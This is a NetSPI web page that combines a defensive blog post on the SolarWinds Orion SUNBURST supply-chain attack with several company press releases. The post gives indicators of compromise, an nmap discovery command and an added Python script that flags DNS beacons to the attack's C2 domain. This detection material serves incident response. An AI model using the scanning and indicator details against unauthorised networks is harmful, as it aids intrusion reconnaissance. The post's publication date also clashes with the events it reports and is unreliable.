As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week. We know now the breaches have been linked back to a supply chain attack on the SolarWinds Orion Platform, a software platform that manages IT operations and products for over 300,000 organizations, including over 425 of the Fortune 500, all ten of the top U.S. telecommunications companies, all five branches of the U.S. Military, all five of the top U.S. accounting firms, and many, many more.

While FireEye, the U.S. Treasury, and National Telecommunications and Information Administration (NTIA) were the first to report a security breach, the breadth of SolarWinds’ customer base is an indicator that the breaches are seemingly the tip of the iceberg.

For the sake of information sharing, here is an overview of the attacks, immediate steps you can take to identify whether you have fallen victim, and tips for protecting your organization as communicated by FireEye, SolarWinds, and NetSPI. For the full technical deep-dive, we highly recommend the FireEye blog post.

Overview: SolarWinds Orion Manual Supply Chain Attack

On December 13, SolarWinds issued a security advisory alerting to a manual supply chain attack on its Orion Platform software builds for versions 2019.4 HF 5 through 2020.2.1, released between March 2020 and June 2020.

FireEye discovered the attack and suggests it is a state-sponsored global intrusion campaign by a group named UNC2452 - though many industry experts are attributing the attack to APT29, a group of hackers associated with the Russian Foreign Intelligence Service.

  • Attack Origin: UNC2452 gained access to victims via trojan-based updates to SolarWinds’ Orion IT monitoring and management software, distributing malware called SUNBURST. Multiple trojanized updates were digitally signed and subsequently deployed via this URL: hxxps://downloads.solarwinds[.]com/solarwinds/CatalogResources/Core/2019.4/2019.4.5220.20574/SolarWinds-Core-v2019.4.5220-Hotfix5.msp. The downloaded file is a standard Windows Installer Patch file, which includes the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component.
  • How It Works: The digitally signed SolarWinds.Orion.Core.BusinessLayer.dll file is a component of the Orion Improvement Program (OIP) software framework that contains a backdoor that communicates with third party servers via the HTTP protocol. The malicious DLL gets loaded into the legitimate SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe executables and can run dormant for up to two weeks before beaconing to a subdomain of avsvmcloud[.]com. To avoid possible detection, the C2 traffic between the beaconing server and the victim is made to resemble legitimate SolarWinds communications. This includes HTTP GET, HEAD, POST and PUT requests with JSON payloads in their bodies. The HTTP responses from the C2 server communicating with the victim contain XML data that resembles .NET assembly data used for normal SolarWinds operations. Within the XML, however, is obfuscated command information that is deobfuscated and then executed by the SolarWinds process on the victim’s system.
  • Impact/Result: Following the initial compromise and deployment of SUNBURST, a variety of more capable payloads can be deployed to facilitate lateral movement and data theft. Common payloads include TEARDROP and Cobalt Strike BEACON, both of which can be loaded into memory to improve stealth of operations.

Known breaches include:

FireEye: On December 8, FireEye communicated a state-sponsored security breach through which the attackers accessed FireEye’s Red Team assessment tools used to test customers’ security. Following the breach, the company made its list of countermeasures public. FireEye has now confirmed that this attack was a result of the SolarWinds Orion supply chain attack.

U.S. Treasury and the National Telecommunications and Information Administration (NTIA): On December 13, Reuters reported that Russian-associated hackers broke into the U.S. Treasury and Commerce department’s Microsoft 365 software and have been monitoring internal email traffic. Following a National Security Council meeting at the White House over the weekend, the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive for all federal agencies to power down SolarWinds Orion.

Organizations are frantically working to figure out if they have been a victim of the attack and how to protect themselves. Here are the immediate steps to take, according to SolarWinds, FireEye, and NetSPI’s team of offensive security experts:

  1. First, determine if SolarWinds Orion is deployed within your environment. If unsure, NetSPI recommends performing a network scan to identify the Orion agent. For example, this can be performed with Nmap by running: nmap --open -sT -p 17778,17790 x.x.x.x/xx, where x.x.x.x is the network address and xx is the subnet mask. If the Orion agent is found, follow SolarWinds’ recommendations.
  2. SolarWinds recommends customers upgrade to Orion Platform version 2020.2.1 HF 1 as soon as possible. It also asks customers with any of the products listed on the security advisory for Orion Platform v2019.4 HF 5 to update to 2019.4 HF 6. Additional suggestions can be found in the security advisory. While upgrading Orion will prevent future backdoored deployments from occurring, it will not remediate the potentially infected deployments that have already taken place via the Orion Platform.
  3. Additionally, FireEye provides a list of recommendations including its signatures to detect this threat actor and supply chain attack. Specific details on the YARA, Snort, and ClamAV signatures can be found on FireEye’s public GitHub page.
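As an added example (not NetSPI's, FireEye's or SolarWinds' code), the script below ties step 1 above to the beaconing behaviour described under How It Works: it parses the grepable (-oG) output of the Orion port scan from step 1 to inventory hosts exposing the agent, then checks resolver logs for queries to avsvmcloud[.]com from those hosts. The scan output, the log lines, the IPs and the subdomain labels are all constructed, and the plain "timestamp client qname" log format is an assumption.

```python
"""Added triage helper for the SolarWinds Orion / SUNBURST guidance above.
Not NetSPI, FireEye or SolarWinds code; every input below is constructed."""
import re
from datetime import datetime

ORION_PORTS = {17778, 17790}      # ports probed by the nmap command in step 1
BEACON_DOMAIN = "avsvmcloud.com"  # SUNBURST beacons to a subdomain of this
# Trojanized Orion builds shipped from March 2020, and SUNBURST can sleep up
# to two weeks before its first beacon, so the search window starts there
# rather than at "the last 14 days".
DEFAULT_SINCE = "2020-03-01"

# Constructed sample of `nmap -sT -p 17778,17790 -oG -` (grepable) output.
NMAP_GREPABLE = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 10.10.1.5 ()\tStatus: Up
Host: 10.10.1.5 ()\tPorts: 17778/open/tcp//unknown///, 17790/open/tcp//unknown///
Host: 10.10.1.9 ()\tPorts: 17778/closed/tcp//unknown///, 17790/filtered/tcp//unknown///
Host: 10.10.1.22 ()\tPorts: 17790/open/tcp//unknown///
# Nmap done (constructed sample)
"""

# Constructed resolver log (assumed format): "<ISO timestamp> <client IP> <queried name>".
DNS_LOG = """\
2020-12-01T08:00:00 10.10.1.5 downloads.solarwinds.com
2020-12-10T03:14:07 10.10.1.5 k3q7.example.avsvmcloud.com
2020-12-11T03:14:09 10.10.1.22 avsvmcloud.com.internal.corp
2020-12-12T09:00:00 10.10.1.40 notavsvmcloud.com
2020-12-05T00:00:00 10.10.1.40 z9.example.avsvmcloud.com
2020-11-01T00:00:00 10.10.1.5 p2m8.example.avsvmcloud.com
"""

_OPEN_PORT = re.compile(r"(\d+)/open/tcp")


def orion_hosts(grepable_lines):
    """Map each host with an open Orion agent port to its sorted open ports."""
    found = {}
    for line in grepable_lines:
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                      # comments and Status-only lines
        ip = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        open_ports = {int(p) for p in _OPEN_PORT.findall(ports_field)} & ORION_PORTS
        if open_ports:
            found.setdefault(ip, set()).update(open_ports)
    return {ip: sorted(ports) for ip, ports in found.items()}


def is_beacon_domain(qname):
    """True for avsvmcloud.com or a genuine subdomain of it. Testing the dotted
    suffix rejects look-alikes such as notavsvmcloud.com and names that merely
    embed the string, such as avsvmcloud.com.internal.corp."""
    name = qname.rstrip(".").lower()
    return name == BEACON_DOMAIN or name.endswith("." + BEACON_DOMAIN)


def sunburst_dns_hits(log_lines, since=DEFAULT_SINCE, orion_ips=None):
    """Return (timestamp, client, qname) for beacon-domain queries at or after
    `since`. With `orion_ips`, keep only queries from the scanned Orion hosts.
    A host with no hit is not cleared: SUNBURST may still be dormant, or may
    have beaconed before the start of the retained logs."""
    cutoff = datetime.fromisoformat(since)
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) != 3:
            continue                      # blank or malformed line
        ts, client, qname = datetime.fromisoformat(parts[0]), parts[1], parts[2]
        if ts < cutoff or not is_beacon_domain(qname):
            continue
        if orion_ips is not None and client not in orion_ips:
            continue
        hits.append((ts.isoformat(), client, qname))
    return hits


if __name__ == "__main__":
    hosts = orion_hosts(NMAP_GREPABLE.splitlines())
    print("Hosts exposing the Orion agent:", hosts)
    for ts, client, qname in sunburst_dns_hits(DNS_LOG.splitlines(), orion_ips=set(hosts)):
        print(f"{ts} {client} queried {qname}: inspect this host for SUNBURST")
```

Run with real `-oG` output and your own resolver export; a query to the beacon domain from a host that is not in the scan inventory (10.10.1.40 in the sample) still deserves a look, since the scan only finds agents that answer on the two ports.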

Get in Touch: To connect with NetSPI for support with testing efforts related to the SolarWinds Orion attack, email info@NetSPI.com.

Post title: FireEye, SolarWinds, U.S. Treasury: What’s Happening in the Cyber Security World Right Now?

Published: 2020-12-02

With the acquisition of Silent Break Security, NetSPI will expand and enhance adversary simulation software and services.

Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, today announced its acquisition of Silent Break Security, a Utah-based security testing firm which specializes in network and application testing, red teaming, and adversary simulation. Through this acquisition, NetSPI will broaden its footprint to create a complete package for offensive cyber security and attack surface management. With the integration of Silent Break Security’s manual testing team, along with their proprietary software platforms and toolsets, NetSPI will improve its ability to scale up vulnerability management programs to meet client needs.

“It’s our vision to secure the world’s attack surfaces with brilliant people and disruptive technology. The Silent Break Security team is the perfect complement to our strong culture and its software stack a natural fit for helping us drive innovation and leverage technology as a force multiplier,” said Aaron Shilts, President and COO of NetSPI. “I am very excited about the opportunity this presents our team. By leveraging the skills that Brady built in his Silent Break Security team, I believe NetSPI has an opportunity to disrupt the penetration testing industry.”

“It is rare to find two organizations that align so closely from a mission, vision, values, and culture perspective,” added Brady Bloxham, Founder and CEO of Silent Break Security. “Both organizations have cultures of high performance, innovation, and agility. Individually, NetSPI and Silent Break have been working toward many of the same goals and, now together, we will become a much greater force to be reckoned with.”

The combined NetSPI and Silent Break team will provide a complete package for offensive security through the following core strategies:

  • Industry Leading Talent: NetSPI’s expert penetration testers conduct over 150,000 hours of testing each year and deliver technical and thought leadership content to the industry. The addition of Silent Break Security’s team, many with U.S. Department of Defense (DoD) experience, will position the combined company as the industry’s strongest penetration testing provider.
  • Technology Innovation: At the foundation of the acquisition is innovation through proprietary technology. Acquiring Silent Break Security and its technology – adversary simulation software (Silent Break Central), Red Team Toolkit, among other tools – with the goal of integrating these into NetSPI’s Resolve™ vulnerability management and orchestration software, will enable the company to consistently find vulnerabilities that others miss, accelerate remediation, provide always-on continuous testing, and simplify the entire testing process.
  • Focus on Training: The commitment to quality is evident in each organization’s emphasis on continuous professional development and training programs for employees and client security teams. Silent Break Security will bring its in-depth training programs on malware development, adversary simulations, and offensive machine learning to NetSPI employees and clients to complement NetSPI’s acclaimed NetSPI University employee training program.
  • Penetration Testing as a Service (PTaaS): The acquired technologies and expertise will allow NetSPI to optimize its core penetration testing service: PTaaS. Automated scanning, real-time reporting, and streamlined remediation processes offered through PTaaS will give the manual testing team more time to focus on the difficult, hard-to-find vulnerabilities that only humans can find. Silent Break’s software fits perfectly into our strategy to deliver always-on attack surface management giving Resolve customers the ability to run internal automated red team “plays” throughout the year.

Brady Bloxham, Founder and CEO of Silent Break Security will become NetSPI’s Chief Technology Officer (CTO). Silent Break Security operations and team members will remain in Lehi, Utah and throughout the U.S.

To learn more about the acquisition of Silent Break Security, connect with the NetSPI team by contacting Heather Rubash (heather.rubash@netspi.com; (612) 385-3006). Keep up to date with NetSPI’s latest news: visit netspi.com.

Watch NetSPI's special announcement from President and COO, Aaron Shilts

Video: https://youtu.be/ffJlDBdNcJo

Watch this special announcement from Silent Break Security’s Founder and CEO, Brady Bloxham — now NetSPI’s CTO

Video: https://youtu.be/VBfJJAqTL78

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with eight of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154

Heather Rubash, NetSPI
heather.rubash@netspi.com
(612) 385-3006

Post title: NetSPI Acquires Silent Break Security

Published: 2020-10-21

Florindo Gallicchio and Robert Richardson bring a combined 50 years of cyber security experience to NetSPI.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, today announced Florindo Gallicchio has joined as Managing Director and Robert Richardson has been promoted to Vice President of Customer Success. Expanding the leadership team is a principal component of NetSPI’s strategy to drive customer growth, program success, and return on investment (ROI) of penetration testing.

“Finding vulnerabilities that other pentesters miss, making reporting easier to digest and act upon, and streamlining our customer engagements through the Resolve™ vulnerability management platform are key areas of focus for our team,” said Aaron Shilts, President at NetSPI. “The growth of our leadership team gives us the opportunity to evolve and expand our services, providing customers peace-of-mind that they’re working with the best security testing and vulnerability management team on the market today.”

Cumulatively, Gallicchio and Richardson bring half a century of cyber security excellence to NetSPI, where they will help customers align security strategies to business goals.

  • Gallicchio is a senior risk management and information security practitioner with over 30 years of experience in building and running cyber security programs that securely manage the business while also achieving and maintaining compliance with regulatory and industry requirements. As Managing Director at NetSPI, he will be a strategic advisor to executives, boards of directors, and technology staff, helping them understand the role of security as a business strategy. Prior to joining NetSPI, Gallicchio was the CISO at a global advisory investment firm in New York City. He began his career with the National Security Agency (NSA) while serving in the U.S. Navy, where in 10 years of service he worked in signals and communications intelligence collection and systems exploitation.
  • Richardson has more than 20 years of experience as a builder of people, processes, and sales enablement that support and drive sales growth. Richardson is being promoted to Vice President of Customer Success at NetSPI, and will focus on people leadership, personnel development, and operational efficiency. Prior to NetSPI, Richardson built a professional services process and delivery capability that resulted in 150% growth over two years as Director of Strategic Staffing and the Program Management Office (PMO) at Optiv Security. Prior to the merger that formed Optiv, Richardson managed projects at FishNet Security.
“Gallicchio and Richardson bring new perspectives to the table,” added Deke George, Founder and CEO of NetSPI. “Notably, Gallicchio’s experience on the client side as a financial services CISO and his time serving in the U.S. Navy coupled with Richardson’s personnel development track record and ability to scale operations will allow NetSPI to further improve our customers’ vulnerability management programs. Having two of the industry’s best minds on our roster is a crucial part of our mission to provide invaluable pentesting services and counsel to our clients – and continue to stay one step ahead of adversaries.” To learn more about NetSPI’s efforts to drive customer success, visit the company website to hear first-hand customer success stories, or connect with the NetSPI team at info@netspi.com or call (612) 465-8880.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.

Media Contact:
Tori Norris, Maccabee PR for NetSPI
tori@maccabee.com
612-294-3100

NetSPI to Help Black Hat USA 2020 Attendees View Penetration Testing and Application Security Through a New Lens
August 3, 2020

During the Black Hat 2020 Virtual Conference, NetSPI, a leader in enterprise security testing and vulnerability management, will provide a fresh perspective on optimizing pentesting and application security (AppSec) programs. Today, there are more software-based solutions than ever before. From rising dependency on smartphone applications to the growing remote workforce increasing the usage of cloud-based software, reliance on software continues to grow. This means more AppSec tools and automation have become available – and, in turn, an overwhelming number of AppSec methodologies and approaches to follow. To navigate these complex security considerations, NetSPI is working to change the way organizations think about AppSec by embracing security throughout the development lifecycle.

Who:

Deke George, CEO, NetSPI
Aaron Shilts, President and COO, NetSPI
Nabil Hannan, Managing Director, NetSPI
Jake Reynolds, Product Manager, NetSPI

What:

On Wednesday, August 5, at 11:20–11:40am PT, NetSPI Managing Director Nabil Hannan and Product Manager Jake Reynolds will host a session titled Extreme Makeover: AppSec Edition. During the session, attendees will learn how leading organizations use different discovery techniques as part of their AppSec program, understand the strengths and weaknesses of common AppSec vulnerability discovery technologies, and adopt techniques that make security frictionless for developers as they embrace a DevSecOps culture. Additionally, they will discover how functional an application security program can be with a “makeover” to:
  • Enhance reporting to empower leadership to optimize AppSec programs
  • Improve vulnerability ingestion, correlation, and enrichment
  • Increase speed to remediation
The NetSPI team will have a virtual exhibitor booth in the Black Hat Business Hall. Schedule a briefing to hear the latest company updates and explore NetSPI’s new products and services, including:
  • Static Application Security Testing [SAST] and Secure Code Review [SCR]: Debuted at Black Hat, the new services are designed to identify application security vulnerabilities earlier in the software development life cycle.
  • Strategic Advisory Services: In June 2020, NetSPI revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, business-objective driven, and mature application security program.
  • Pentesting as a Service (PTaaS): Launched in 2020, NetSPI’s PTaaS delivery model puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and add the ability to perform always-on continuous testing.
When:

Virtual Session: Wednesday, August 5, 11:20–11:40am PST
Black Hat 2020 Virtual Conference: August 1-6, 2020

Where:

Attend the virtual session, Extreme Makeover: AppSec Edition, online here. Stop by NetSPI’s virtual booth by searching for NetSPI in the Black Hat event portal.

Media:

Virtual briefings with the NetSPI team are available upon request. To attend the virtual session on August 5, register for a free Black Hat Business Pass.

Contact:

Tori Norris
Maccabee Public Relations on behalf of NetSPI
tori@maccabee.com, (612) 294-3100

NetSPI Brings Scale, Agility, and Speed to Static Application Security Testing and Secure Code Review
July 28, 2020
The new services are designed to identify application security vulnerabilities earlier in the software development life cycle.
Minneapolis, Minnesota – To mitigate possible security vulnerabilities early in the fast-paced software development life cycle, today NetSPI, the leader in enterprise security testing and vulnerability management, launched Static Application Security Testing (SAST) and Secure Code Review (SCR) services to aid application and software development teams in establishing a more strategic approach to building secure applications. Key to NetSPI’s multi-level secure code review services involving SAST and SCR is a thorough inspection of source and compiled code to ensure security risks are eliminated before software is deployed to production, at which point the cost of remediation can increase exponentially. “With Continuous Integration/Continuous Deployment more and more becoming the backbone of the modern DevOps environment, it’s more important than ever to detect and address vulnerabilities through Static Application Security Testing and Source Code Review processes, a service that is complementary to an organization’s penetration testing efforts,” said Nabil Hannan, managing director at NetSPI. “Both testing functions enable more comprehensive vulnerability detection and, in many cases, identify vulnerabilities that are not possible to discover during dynamic testing and analysis.” NetSPI’s SAST and SCR services are offered in various engagement structures, giving application and software development teams options to apply the appropriate level of testing depth to detect, validate, and resolve security issues based on the business criticality and risk profile of their applications. The services also help teams adhere to application development compliance standards, including PCI DSS and HIPAA. NetSPI’s SAST and SCR offerings include:
  • Static Application Security Testing (SAST)—A static analysis performed with a combination of commercial, open source, and proprietary SAST tools, resulting in an assessment report from NetSPI that describes found vulnerabilities and actionable remediation guidance. Additionally, NetSPI offers a streamlined, more economical SAST service which focuses only on testing around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
  • Static Application Security Testing (SAST): Triaging—As an augmentation to an organization’s internal use of SAST tools in Application Security Programs, NetSPI offers triage services. By analyzing the data and assigning degrees of urgency on behalf of the security teams, NetSPI can validate the exploitability of vulnerabilities to remove any false positive findings, allowing development teams the time to focus exclusively on remediation.
  • Secure Code Review (SCR)—Building off the SAST offerings, NetSPI’s SCR offering employs cyber security experts to review underlying frameworks and libraries that are being leveraged to build the application. From there, manual testers identify vulnerabilities that automated scanners cannot detect, such as complex injection attacks, insecure error handling as well as authentication and authorization issues. Additionally, NetSPI offers a streamlined, more economical SCR service which focuses only on reporting around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
Unique to NetSPI is its instructor-led training program around secure coding and remediation for development teams, made available to clients after completion of Static Application Security Testing (SAST) or Secure Code Review (SCR) engagements. Available for classes of up to 20 people, NetSPI’s one-day training details the top five categories of vulnerabilities identified in the SAST or SCR engagement and provides insights specific to that organization as well as remediation or mitigation techniques. “We’ve seen a movement to the left, in terms of prioritizing SCR earlier in the SDLC process as Application Security Programs have evolved,” said Hannan. “We support this strategic approach to security as it is critical to identify and remediate vulnerabilities, and in some cases even prevent them, during the software development phase.” Learn more about Secure Code Review (SCR) and Static Application Security Testing (SAST) from NetSPI online at netspi.com/security-testing/secure-code-review/ or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.

Contact:
Tori Norris
tori@maccabee.com
612-294-3100

NetSPI Reimagines Strategic Advisory Services, With a Focus on Application Security
June 30, 2020
The new offering will help CISOs and software developers/engineers navigate application security to promote cyber security program maturity.
Minneapolis, Minnesota  – Today, NetSPI, the leader in enterprise security testing and vulnerability management, revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, well-balanced, business-objective driven, and mature application security program. While advisory services are not new to NetSPI, the company saw an opportunity to use its breadth of knowledge in security testing to help define and guide organizations to implement application security into broader threat and vulnerability management programs. Through NetSPI’s Strategic Advisory Services, the company will share tangible and data-driven guidance on building or improving application security strategies and other software security initiatives. The three core functions and benefits of the new offering include:
  1. Program Benchmarking: Using real-world data, NetSPI’s program benchmarking services enable IT and security teams to evaluate program maturity against empirical data from the industry, measure and track the progress of security efforts objectively over time, compare security efforts with peers in the same business vertical, and ultimately help organizations adapt to current security best practices. Each benchmarking report will yield an evaluation of the current state of a company’s Application Security Program with details around focus areas for improvement along with areas that are currently addressing the organization’s Application Security needs effectively.
  2. Roadmap Development: Commonly performed alongside benchmarking, NetSPI’s roadmapping services define the future state of application security programs and the strategic path forward. The program roadmap will guide security stakeholders to determine the best approach to optimize application security investments by identifying unique organizational needs, leveraging established frameworks, and performing penetration tests to allow for early discovery of the types of vulnerabilities that exist while determining realistic goals and defining an appropriate timeline around key milestones.
  3. Security Metrics Development: Metrics, unlike raw data or measurements, can help answer specific business questions and help teams track progress. They are a critical component for measuring the ROI of security programs, but organizations often lack the proper metrics to evaluate how application security efforts are influencing and helping achieve their business objectives. With NetSPI’s security metrics services, organizations will work with a consultant to define metrics that can be automated by leveraging existing business processes and raw data, providing the context needed to make effective business decisions.
“Given how fast application development techniques and methodologies are transforming, companies need to ensure that their security practices are staying current with the ever-evolving pressures around compliance and governance, software deployment, DevOps, Software Development Lifecycle (SDLC), and training,” said Nabil Hannan, managing director at NetSPI. “Understanding the current level of maturity and developing a data-driven plan to evolve your application security program is key to the success of your organization’s security efforts.” Learn more about Strategic Advisory Services from NetSPI online at Strategic Advisory or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.

NetSPI Response to COVID-19
March 17, 2020
On March 17, 2020, we shared the below communication with our customers in regards to COVID-19, and wanted to make it available to the broader community.
Minneapolis, Minnesota  –  During these unprecedented times, our team wanted to reach out, first and foremost, to wish you continued health and safety. In addition, we wanted to share how we are responding to the evolving COVID-19 situation through ongoing business continuity planning and our flexible approach to move forward with your penetration testing while also protecting your critical infrastructure.

NetSPI's Business Continuity Planning

We run business continuity planning exercises regularly, and recently performed a special exercise to simulate additional work-from-home load. All systems performed well in this test and validated our resiliency in a situation where all physical NetSPI offices are closed. In addition, our Resolve™ platform is crucial to our resiliency in that it allows our team of testers and project managers to communicate seamlessly with your team ensuring you can prioritize and fix your vulnerabilities faster.

Flexibility to Protect Your Critical Infrastructure

NetSPI is extremely flexible and our testing is built to ensure we do not impact your critical infrastructure. As such, we can:

  • Perform off-hours testing.
  • Modify the configuration of our tools (tweak our systems to go lower and slower than normal).
  • Conduct testing in QA and dev environments for pre-production application testing.

Employee Health and Travel

The health and safety of our employees is our primary concern. We are following CDC, state, and local guidelines for our staff and office closures. As a global organization, we have always supported a strong virtual infrastructure for team collaboration. At this time, most of our client interaction is taking place over email, phone, and video conference. We continue to focus on exceeding expectations, maintaining connectivity, and ensuring continued contact with all clients to answer questions and manage your testing needs. NetSPI is a strong, healthy business and team. Our clients can be confident leveraging our testing expertise, which will continue without interruption. You are the backbone of our business and we thank you for your continued partnership and confidence. If you have specific questions about a project, please reach out to your sales or PMO contact. If you would like to speak directly to someone on our Executive Team, please feel free to contact me directly. We appreciate your business and look forward to continuing to serve you.

Aaron Shilts
President & COO
Aaron.Shilts@NetSPI.com
C: 612-326-4018

NetSPI Introduces Penetration Testing as a Service (PTaaS) Powered by Resolve™
February 17, 2020
PTaaS will be demoed at RSAC 2020, showcasing how the delivery model enables organizations to keep pace with today’s cybersecurity landscape.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, today debuted its new delivery model, Penetration Testing as a Service (PTaaS) powered by the Resolve™ platform. PTaaS puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and add the ability to perform always-on continuous testing. Taking note of customer needs and emerging attack surfaces, NetSPI has leveraged its knowledge of traditional, point-in-time pentests to develop a scalable, always-on model for enterprise security testing. NetSPI PTaaS delivers program-level security testing comprised of an expert manual pentesting team enhanced by automation. “During our 20 years of penetration testing, our clients have consistently asked for guidance to understand, report on, and remediate their security vulnerabilities. While we’ve been excited to provide this assistance, we also knew there was more we could do to meet all our clients’ needs, which led to the creation of PTaaS,” said NetSPI President and Chief Operating Officer, Aaron Shilts. “As a leader in the cybersecurity industry, our experts have always found vulnerabilities that others miss, but PTaaS allows us to go a step further – delivering clear, actionable recommendations to our customers, enabling them to find and fix their vulnerabilities faster.” According to Gartner, “although separate from VA, penetration testing plays an important role in the prioritization and assessment of vulnerabilities from Gartner’s RBVM (risk-based vulnerability management) methodology. These services are testing your environment, with real-world skills and knowledge of the prevailing threat landscape. Security leaders need to take these recommendations and apply it directly in your security programs to address their prioritized findings.”* NetSPI believes PTaaS powered by Resolve™ solves critical cybersecurity challenges by enabling:
  • Real-time accessible reporting: Gone are the days of managing multiple static PDF reports with out-of-date vulnerability information. With PTaaS powered by Resolve™, organizations can access their data in real-time as vulnerabilities are found by the NetSPI team of experts, and easily generate custom reports as desired.
  • Increased speed to remediation: PTaaS powered by Resolve™ helps organizations fix their vulnerabilities faster than traditional pentesting. Resolve™, a SaaS platform, will house all vulnerability data and provide remediation guidance for real-time access and assessment. In addition, customers can communicate with NetSPI security experts via the platform for additional clarity, to request remediation testing, or to scope a new engagement.
  • Continued manual testing: NetSPI’s team of highly skilled employees will continue its award-winning service of deep-dive manual penetration testing as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.
  • More testing: Organizations with a mature security program understand that point-in-time testing is not a viable model to continuously secure their applications and networks. New code and configurations are released every day, and the continuous security program of PTaaS powered by the Resolve™ platform delivers results to customers around the clock, enabling them to manage their vulnerabilities more easily and efficiently.
Learn more about NetSPI PTaaS powered by Resolve™ here, or set up a 1:1 meeting at RSAC on February 24-28 online here.

*Gartner, “Market Guide for Vulnerability Assessment,” Craig Lawson, et al., 20 November 2019

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.

Media Contact
Tori Norris
Maccabee Public Relations
Email: tori@maccabee.com
Phone: (612) 294-3100

NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™
February 4, 2020
Minneapolis, Minnesota – NetSPI, a leader in vulnerability testing and management, is exhibiting at RSAC 2020 at the Moscone Center in San Francisco. On February 24-28, the halls will be filled with cybersecurity industry conversations, including expert-led sessions and keynotes, innovation programs, in-depth tutorials and trainings, expanded networking opportunities, product demos, and more. This year, the conference theme is “Human Element,” exploring our critical role in ensuring a safer, more secure future. During the conference, the NetSPI leadership team will be showcasing its new Penetration Testing as a Service (PTaaS) delivery model powered by Resolve™.

Who:

Deke George, Founder and CEO at NetSPI
Aaron Shilts, President and COO at NetSPI
Charles Horton, SVP Client Services at NetSPI
Jake Reynolds, Product Manager at NetSPI

What:

RSAC Exhibitor Booth – Meet the NetSPI team at booth #4201 to learn more about their expertise in penetration testing and vulnerability management. Get a first look and demo of PTaaS Powered by Resolve™.

“Scaling Your Security Program with Penetration Testing as a Service” – Whether managing an annual penetration test, or delivering and prioritizing millions of vulnerabilities, traditional service delivery methods fall short. Visit booth S-1500 in the RSAC Briefing Center on Thursday, February 28 at 4:40pm PST to hear NetSPI Product Manager Jake Reynolds speak about how Penetration Testing as a Service scales and operationalizes continuous penetration testing in an ongoing, consumable fashion. View the full conference agenda here.

When:

February 24-29, 2020

Where:

Booth #4201
Moscone Center
San Francisco, California

About NetSPI

